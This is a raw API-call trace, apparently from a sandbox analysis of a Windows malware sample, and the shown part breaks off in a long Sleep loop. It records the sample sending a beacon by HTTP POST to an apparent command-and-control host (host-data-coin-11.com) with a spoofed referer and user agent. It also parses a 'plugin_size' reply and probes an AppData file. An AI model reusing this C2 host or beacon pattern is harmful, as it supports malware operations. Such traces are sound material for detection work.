[0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x137c0fe7 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x432d2ca8 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x693e41c7 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x56adfc91 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3b10041f [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4065ec9d [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x65813922 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5ce9fb51 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xddeef2 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x14b809dc [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x74381df8 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1f87dcaa [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x579fb412 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xe2c8f28 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x59d128f [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x402da8a9 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x366dae0 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7992403e [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x51c16e63 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6e0953ed [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x540de443 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x770bd6fe [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xcbaa4d8 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x46d2dbea [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4cfb48cb [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x38ec7ea0 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x364af7d2 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x116627ac [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2146e183 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3433ac5b [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xdfe99e [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1b4b1be2 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x462d2eb0 [0199.281] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6c301be3 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5f877330 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5199ef48 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7e958bfb [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6cdb0e0b [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xc9d73fe [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x42c49c03 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x46ec1045 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x30e4b19f [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7b55c3b5 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x70e862aa [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4aa82148 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x24220652 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x48363753 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x29042489 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x42bab7f2 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x37b17533 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x70221adb [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x37443295 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4edf10b6 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x58045972 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x21687470 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4532291f [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb25a7a5 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x46d135a9 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4da17b4a [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x345b00ea [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3d49bc4a [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x67b64dfc [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x58dfb58d [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xa99f95 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1db56e1c [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x16cb5b75 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x95795a8 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x32c85f04 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x22faff52 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3d096f54 [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7d09f65a [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x87c5a4f [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x197c280c [0199.282] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3b57d478 [0199.283] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3104388c [0199.283] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x43b52e26 [0199.283] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6d6de71 [0199.283] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x78cfba16 [0199.283] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3ee905d1 [0199.283] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5ae51547 [0199.283] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6db527d8 [0199.283] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x314e6cbf [0199.283] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5cdfd141 [0199.283] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3b2a8f0 [0199.283] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7ed11db6 [0199.283] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2d4b8b49 [0199.283] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x62d92fb7 [0199.283] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5dc009c4 [0199.283] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x475eca72 [0199.283] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x50b0349b [0199.283] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0xd9) returned 0x82f2430 [0199.283] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0199.283] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0199.283] lstrcatA (in: lpString1="", lpString2="pub2" | out: lpString1="pub2") returned="pub2" [0199.283] lstrcatA (in: lpString1="", lpString2="UD_w`m$gEp\"V\"h@h]tLu\"4k$1f0PgYJo\"*`,uHJ[#C9j,5])7O2rCznXMf;z%AhsxvRpd;.jS]kGvU`F]8+L%QMxyh6#5RpVDa:7Kw<_vO#)vC4YLMe?BKvzGDcXZlnM%yHc4O_6;*Q<6%CPY\\K^9b!xQ" | out: lpString1="VG(p@(Svm\"lSam2UZ%gPgXMdtSUppeXJ4Xj=C3jXw_]m>h@h]tLu\"4k$1f0PgYJo\"*`,uHJ[#C9j,5])7O2rCznXMf;z%AhsxvRpd;.jS]kGvU`F]8+L%QMxyh6#5RpVDa:7Kw<_vO#)vC4YLMe?BKvzGDcXZlnM%yHc4O_6;*Q<6%CPY\\K^9b!xQ") returned="VG(p@(Svm\"lSam2UZ%gPgXMdtSUppeXJ4Xj=C3jXw_]m>h@h]tLu\"4k$1f0PgYJo\"*`,uHJ[#C9j,5])7O2rCznXMf;z%AhsxvRpd;.jS]kGvU`F]8+L%QMxyh6#5RpVDa:7Kw<_vO#)vC4YLMe?BKvzGDcXZlnM%yHc4O_6;*Q<6%CPY\\K^9b!xQ" [0226.231] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x10c) returned 0x82f2640 [0226.231] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0226.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x82f2300, cbMultiByte=30, lpWideCharStr=0x82f2640, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0226.231] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x814f518 | out: pProxyConfig=0x814f518) returned 1 [0226.308] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3fb0120 [0226.310] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x814f5d0 | out: lpUrlComponents=0x814f5d0) returned 1 [0226.310] WinHttpConnect (hSession=0x3fb0120, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3fa9cf0 [0226.311] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x12) returned 0x82f2760 [0226.311] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x68) returned 0x82f2780 [0226.311] WinHttpOpenRequest (hConnect=0x3fa9cf0, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x6e9a680 [0226.311] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x4e) returned 0x82f27f0 [0226.311] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x10d) returned 0x82f2850 [0226.311] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1d1ecdb9 [0226.311] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x12) returned 0x82f2970 [0226.311] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x17) returned 0x82f2990 [0226.311] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x188ef797 [0226.311] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x785bcf77 [0226.311] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x78a736f1 [0226.311] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x42d7f336 [0226.311] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x13b12a2f [0226.311] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x43b85d5b [0226.311] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x21e0dfc0 [0226.311] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3915714e [0226.311] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7a26dc06 [0226.311] wsprintfW (in: param_1=0x82f2850, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://hwiauwyv.net/") returned 42 [0226.311] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2990) returned 0x17 [0226.311] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2990) returned 1 [0226.311] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2970) returned 0x12 [0226.311] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2970) returned 1 [0226.312] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f27f0) returned 0x4e [0226.312] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f27f0) returned 1 [0226.317] WinHttpAddRequestHeaders (hRequest=0x6e9a680, pwszHeaders="Accept: */*\r\nReferer: http://hwiauwyv.net/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0226.317] WinHttpSendRequest (hRequest=0x6e9a680, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x82f24d0*, dwOptionalLength=0x15c, dwTotalLength=0x15c, dwContext=0x0) returned 1 [0226.505] WinHttpReceiveResponse (hRequest=0x6e9a680, lpReserved=0x0) returned 1 [0226.505] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x2800) returned 0x82f2970 [0226.505] WinHttpReadData (in: hRequest=0x6e9a680, lpBuffer=0x82f2970, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x814f688 | out: lpBuffer=0x82f2970*, lpdwNumberOfBytesRead=0x814f688*=0x18) returned 1 [0226.507] RtlReAllocateHeap (Heap=0x82f0000, Flags=0x8, Ptr=0x82f2970, Size=0x5000) returned 0x82f2970 [0226.507] WinHttpReadData (in: hRequest=0x6e9a680, lpBuffer=0x82f2988, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x814f688 | out: lpBuffer=0x82f2988*, lpdwNumberOfBytesRead=0x814f688*=0x0) returned 1 [0226.508] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2800000 [0226.509] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2970) returned 1 [0226.509] WinHttpCloseHandle (hInternet=0x6e9a680) returned 1 [0226.509] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2850) returned 0x10d [0226.510] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2850) returned 1 [0226.510] WinHttpCloseHandle (hInternet=0x3fa9cf0) returned 1 [0226.510] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2780) returned 0x68 [0226.510] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2780) returned 1 [0226.510] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2760) returned 0x12 [0226.510] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2760) returned 1 [0226.510] WinHttpCloseHandle (hInternet=0x3fb0120) returned 1 [0226.510] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2640) returned 0x10c [0226.511] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2640) returned 1 [0226.511] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f23b0) returned 0x116 [0226.511] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f23b0) returned 1 [0226.511] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f24d0) returned 0x165 [0226.511] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f24d0) returned 1 [0226.511] lstrlenA (lpString="ä\x070|:|plugin_size=0") returned 19 [0226.511] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x15) returned 0x82f23b0 [0226.511] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0226.511] lstrlenA (lpString="plugin_size") returned 11 [0226.511] atoi (_Str="0") returned 0 [0226.511] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0226.511] lstrlenA (lpString="|:|") returned 3 [0226.511] MapViewOfFile (hFileMappingObject=0x1490, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x4750000 [0226.523] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0226.523] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x4750000) returned 0x0 [0226.575] atoi (_Str="0") returned 0 [0226.575] VirtualFree (lpAddress=0x2800000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0226.577] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2300) returned 0x26 [0226.577] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2300) returned 1 [0226.606] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0226.608] Sleep (dwMilliseconds=0x258) [0226.655] Sleep (dwMilliseconds=0x258) [0226.729] Sleep (dwMilliseconds=0x258) [0226.786] Sleep (dwMilliseconds=0x258) [0226.827] Sleep (dwMilliseconds=0x258) [0226.843] Sleep (dwMilliseconds=0x258) [0226.858] Sleep (dwMilliseconds=0x258) [0226.874] Sleep (dwMilliseconds=0x258) [0226.936] Sleep (dwMilliseconds=0x258) [0227.015] Sleep (dwMilliseconds=0x258) [0227.047] Sleep (dwMilliseconds=0x258) [0227.107] Sleep (dwMilliseconds=0x258) [0227.125] Sleep (dwMilliseconds=0x258) [0227.139] Sleep (dwMilliseconds=0x258) [0227.201] Sleep (dwMilliseconds=0x258) [0227.251] Sleep (dwMilliseconds=0x258) [0227.414] Sleep (dwMilliseconds=0x258) [0227.421] Sleep (dwMilliseconds=0x258) [0227.483] Sleep (dwMilliseconds=0x258) [0227.530] Sleep (dwMilliseconds=0x258) [0227.559] Sleep (dwMilliseconds=0x258) [0227.561] Sleep (dwMilliseconds=0x258) [0227.590] Sleep (dwMilliseconds=0x258) [0227.597] Sleep (dwMilliseconds=0x258) [0227.608] Sleep (dwMilliseconds=0x258) [0227.625] Sleep (dwMilliseconds=0x258) [0227.639] Sleep (dwMilliseconds=0x258) [0227.716] Sleep (dwMilliseconds=0x258) [0227.764] Sleep (dwMilliseconds=0x258) [0227.790] Sleep (dwMilliseconds=0x258) [0227.794] Sleep (dwMilliseconds=0x258) [0227.810] Sleep (dwMilliseconds=0x258) [0227.830] Sleep (dwMilliseconds=0x258) [0227.842] Sleep (dwMilliseconds=0x258) [0227.857] Sleep (dwMilliseconds=0x258) [0227.874] Sleep (dwMilliseconds=0x258) [0227.935] Sleep (dwMilliseconds=0x258) [0227.996] Sleep (dwMilliseconds=0x258) [0228.021] Sleep (dwMilliseconds=0x258) [0228.028] Sleep (dwMilliseconds=0x258) [0228.044] Sleep (dwMilliseconds=0x258) [0228.059] Sleep (dwMilliseconds=0x258) [0228.075] Sleep (dwMilliseconds=0x258) [0228.091] Sleep (dwMilliseconds=0x258) [0228.153] Sleep (dwMilliseconds=0x258) [0228.205] Sleep (dwMilliseconds=0x258) [0228.230] Sleep (dwMilliseconds=0x258) [0228.231] Sleep (dwMilliseconds=0x258) [0228.246] Sleep (dwMilliseconds=0x258) [0228.263] Sleep (dwMilliseconds=0x258) [0228.278] Sleep (dwMilliseconds=0x258) [0228.293] Sleep (dwMilliseconds=0x258) [0228.310] Sleep (dwMilliseconds=0x258) [0228.371] Sleep (dwMilliseconds=0x258) [0228.419] Sleep (dwMilliseconds=0x258) [0228.435] Sleep (dwMilliseconds=0x258) [0228.450] Sleep (dwMilliseconds=0x258) [0228.465] Sleep (dwMilliseconds=0x258) [0228.481] Sleep (dwMilliseconds=0x258) [0228.496] Sleep (dwMilliseconds=0x258) [0228.512] Sleep (dwMilliseconds=0x258) [0228.574] Sleep (dwMilliseconds=0x258) [0228.621] Sleep (dwMilliseconds=0x258) [0228.655] Sleep (dwMilliseconds=0x258) [0228.668] Sleep (dwMilliseconds=0x258) [0228.683] Sleep (dwMilliseconds=0x258) [0228.718] Sleep (dwMilliseconds=0x258) [0228.731] Sleep (dwMilliseconds=0x258) [0228.792] Sleep (dwMilliseconds=0x258) [0228.839] Sleep (dwMilliseconds=0x258) [0228.863] Sleep (dwMilliseconds=0x258) [0228.870] Sleep (dwMilliseconds=0x258) [0228.886] Sleep (dwMilliseconds=0x258) [0228.902] Sleep (dwMilliseconds=0x258) [0228.917] Sleep (dwMilliseconds=0x258) [0228.933] Sleep (dwMilliseconds=0x258) [0228.996] Sleep (dwMilliseconds=0x258) [0229.043] Sleep (dwMilliseconds=0x258) [0229.077] Sleep (dwMilliseconds=0x258) [0229.090] Sleep (dwMilliseconds=0x258) [0229.104] Sleep (dwMilliseconds=0x258) [0229.120] Sleep (dwMilliseconds=0x258) [0229.136] Sleep (dwMilliseconds=0x258) [0229.198] Sleep (dwMilliseconds=0x258) [0229.245] Sleep (dwMilliseconds=0x258) [0229.287] Sleep (dwMilliseconds=0x258) [0229.293] Sleep (dwMilliseconds=0x258) [0229.314] Sleep (dwMilliseconds=0x258) [0229.323] Sleep (dwMilliseconds=0x258) [0229.339] Sleep (dwMilliseconds=0x258) [0229.354] Sleep (dwMilliseconds=0x258) [0229.416] Sleep (dwMilliseconds=0x258) [0229.463] Sleep (dwMilliseconds=0x258) [0229.487] Sleep (dwMilliseconds=0x258) [0229.494] Sleep (dwMilliseconds=0x258) [0229.512] Sleep (dwMilliseconds=0x258) [0229.526] Sleep (dwMilliseconds=0x258) [0229.541] Sleep (dwMilliseconds=0x258) [0229.557] Sleep (dwMilliseconds=0x258) [0229.620] Sleep (dwMilliseconds=0x258) [0229.666] Sleep (dwMilliseconds=0x258) [0229.688] Sleep (dwMilliseconds=0x258) [0229.712] Sleep (dwMilliseconds=0x258) [0229.713] Sleep (dwMilliseconds=0x258) [0229.729] Sleep (dwMilliseconds=0x258) [0229.744] Sleep (dwMilliseconds=0x258) [0229.760] Sleep (dwMilliseconds=0x258) [0229.815] Sleep (dwMilliseconds=0x258) [0229.853] Sleep (dwMilliseconds=0x258) [0229.888] Sleep (dwMilliseconds=0x258) [0229.900] Sleep (dwMilliseconds=0x258) [0229.916] Sleep (dwMilliseconds=0x258) [0229.931] Sleep (dwMilliseconds=0x258) [0229.948] Sleep (dwMilliseconds=0x258) [0229.962] Sleep (dwMilliseconds=0x258) [0230.025] Sleep (dwMilliseconds=0x258) [0230.072] Sleep (dwMilliseconds=0x258) [0230.089] Sleep (dwMilliseconds=0x258) [0230.103] Sleep (dwMilliseconds=0x258) [0230.120] Sleep (dwMilliseconds=0x258) [0230.135] Sleep (dwMilliseconds=0x258) [0230.150] Sleep (dwMilliseconds=0x258) [0230.165] Sleep (dwMilliseconds=0x258) [0230.228] Sleep (dwMilliseconds=0x258) [0230.275] Sleep (dwMilliseconds=0x258) [0230.291] Sleep (dwMilliseconds=0x258) [0230.306] Sleep (dwMilliseconds=0x258) [0230.321] Sleep (dwMilliseconds=0x258) [0230.337] Sleep (dwMilliseconds=0x258) [0230.352] Sleep (dwMilliseconds=0x258) [0230.368] Sleep (dwMilliseconds=0x258) [0230.430] Sleep (dwMilliseconds=0x258) [0230.477] Sleep (dwMilliseconds=0x258) [0230.493] Sleep (dwMilliseconds=0x258) [0230.509] Sleep (dwMilliseconds=0x258) [0230.525] Sleep (dwMilliseconds=0x258) [0230.540] Sleep (dwMilliseconds=0x258) [0230.555] Sleep (dwMilliseconds=0x258) [0230.571] Sleep (dwMilliseconds=0x258) [0230.633] Sleep (dwMilliseconds=0x258) [0230.680] Sleep (dwMilliseconds=0x258) [0230.719] Sleep (dwMilliseconds=0x258) [0230.727] Sleep (dwMilliseconds=0x258) [0230.743] Sleep (dwMilliseconds=0x258) [0230.758] Sleep (dwMilliseconds=0x258) [0230.774] Sleep (dwMilliseconds=0x258) [0230.836] Sleep (dwMilliseconds=0x258) [0230.883] Sleep (dwMilliseconds=0x258) [0230.907] Sleep (dwMilliseconds=0x258) [0230.914] Sleep (dwMilliseconds=0x258) [0230.931] Sleep (dwMilliseconds=0x258) [0230.945] Sleep (dwMilliseconds=0x258) [0230.961] Sleep (dwMilliseconds=0x258) [0230.977] Sleep (dwMilliseconds=0x258) [0231.040] Sleep (dwMilliseconds=0x258) [0231.086] Sleep (dwMilliseconds=0x258) [0231.115] Sleep (dwMilliseconds=0x258) [0231.117] Sleep (dwMilliseconds=0x258) [0231.133] Sleep (dwMilliseconds=0x258) [0231.149] Sleep (dwMilliseconds=0x258) [0231.164] Sleep (dwMilliseconds=0x258) [0231.180] Sleep (dwMilliseconds=0x258) [0231.242] Sleep (dwMilliseconds=0x258) [0231.288] Sleep (dwMilliseconds=0x258) [0231.315] Sleep (dwMilliseconds=0x258) [0231.319] Sleep (dwMilliseconds=0x258) [0231.335] Sleep (dwMilliseconds=0x258) [0231.351] Sleep (dwMilliseconds=0x258) [0231.366] Sleep (dwMilliseconds=0x258) [0231.382] Sleep (dwMilliseconds=0x258) [0231.444] Sleep (dwMilliseconds=0x258) [0231.491] Sleep (dwMilliseconds=0x258) [0231.528] Sleep (dwMilliseconds=0x258) [0231.538] Sleep (dwMilliseconds=0x258) [0231.553] Sleep (dwMilliseconds=0x258) [0231.570] Sleep (dwMilliseconds=0x258) [0231.586] Sleep (dwMilliseconds=0x258) [0231.600] Sleep (dwMilliseconds=0x258) [0231.663] Sleep (dwMilliseconds=0x258) [0231.711] Sleep (dwMilliseconds=0x258) [0231.745] Sleep (dwMilliseconds=0x258) [0231.756] Sleep (dwMilliseconds=0x258) [0231.772] Sleep (dwMilliseconds=0x258) [0231.788] Sleep (dwMilliseconds=0x258) [0231.803] Sleep (dwMilliseconds=0x258) [0231.866] Sleep (dwMilliseconds=0x258) [0231.929] Sleep (dwMilliseconds=0x258) [0231.943] Sleep (dwMilliseconds=0x258) [0231.959] Sleep 